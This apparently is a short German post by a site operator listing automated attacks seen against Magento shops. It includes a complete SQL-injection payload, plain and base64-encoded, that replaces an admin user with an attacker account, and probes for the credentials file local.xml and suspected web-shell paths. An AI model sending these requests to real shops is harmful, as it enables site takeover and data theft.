typische Magento Angriffe

mittlerweile typische, automatisierte Angriffe auf Magento Systeme

parameter sind base_64 encoded

{{block type="adminhtml/report_search_grid"}} num_results[from]=0&num_results[field_expr]=1=2);DELETE FROM `admin_user` WHERE user_id = ; DELETE FROM `admin_role` WHERE user_id = ; INSERT INTO `admin_user` (`user_id`, `firstname`, `lastname`, `email`, `username`, `password`, `created`, `modified`, `logdate`, `lognum`, `reload_acl_flag`, `is_active`, `extra`) VALUES (,'firstname', 'lastname', 'mail', 'username', 'pwd', 'null', 'null', 'null', 1, 0, 1, 'N;'); INSERT INTO `admin_role` (`parent_id`, `tree_level`, `sort_order`, `role_type`, `user_id`, `role_name`) VALUES (1, 2, 0, 'U', , 'magent');; --

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ/index.php/admin/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VyX2lkID0gMzU7ICBERUxFVEUgRlJPTSBgYWRtaW5fcm9sZWAgV0hFUkUgdXNlcl9pZCA9IDM1OyAgSU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsIGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLCBgZW1haWxgLCBgdXNlcm5hbWVgLCBgcGFzc3dvcmRgLCBgY3JlYXRlZGAsIGBtb2RpZmllZGAsIGBsb2dkYXRlYCwgYGxvZ251bWAsIGByZWxvYWRfYWNsX2ZsYWdgLCBgaXNfYWN0aXZlYCwgYGV4dHJhYCkgVkFMVUVTICAoMzUsJ2JhY2t1cCcsICdjcmV3JywgJ2JhY2t1cEBtYWdlbnRvcy5jb20nLCAnYmxhY2t1bml4JywgJ2M0Yjg3MTcwYjg5YTc2MzQwNzNmZGE3YTFjMzZlMTAxJywgJ251bGwnLCAnbnVsbCcsICdudWxsJywgMSwgMCwgMSwgJ047Jyk7ICBJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLCBgdHJlZV9sZXZlbGAsIGBzb3J0X29yZGVyYCwgYHJvbGVfdHlwZWAsIGB1c2VyX2lkYCwgYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwgMiwgMCwgJ1UnLCAzNSwgJ21hZ2VudCcpOzsgLS0g

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ/downloader/

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ//js/webforms/logic.js

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ/app/etc/local.xml

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ//js/webforms/logic.js

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ/api/xmlrpc

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ//js/webforms/logic.js

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ/skin/error.php

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ/skin/upil.php

GET /index.php/admin/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VyX2lkID0gMzU7ICBERUxFVEUgRlJPTSBgYWRtaW5fcm9sZWAgV0hFUkUgdXNlcl9pZCA9IDM1OyAgSU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsIGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLCBgZW1haWxgLCBgdXNlcm5hbWVgLCBgcGFzc3dvcmRgLCBgY3JlYXRlZGAsIGBtb2RpZmllZGAsIGBsb2dkYXRlYCwgYGxvZ251bWAsIGByZWxvYWRfYWNsX2ZsYWdgLCBgaXNfYWN0aXZlYCwgYGV4dHJhYCkgVkFMVUVTICAoMzUsJ2JhY2t1cCcsICdjcmV3JywgJ2JhY2t1cEBtYWdlbnRvcy5jb20nLCAnYmxhY2t1bml4JywgJ2M0Yjg3MTcwYjg5YTc2MzQwNzNmZGE3YTFjMzZlMTAxJywgJ251bGwnLCAnbnVsbCcsICdudWxsJywgMSwgMCwgMSwgJ047Jyk7ICBJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLCBgdHJlZV9sZXZlbGAsIGBzb3J0X29yZGVyYCwgYHJvbGVfdHlwZWAsIGB1c2VyX2lkYCwgYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwgMiwgMCwgJ1UnLCAzNSwgJ21hZ2VudCcpOzsgLS0g

GET /downloader/

GET //js/webforms/logic.js

GET /app/etc/local.xml

GET //js/webforms/logic.js

GET /api/xmlrpc

POST /api/xmlrpc

GET //js/webforms/logic.js

GET /skin/error.php

GET /skin/upil.php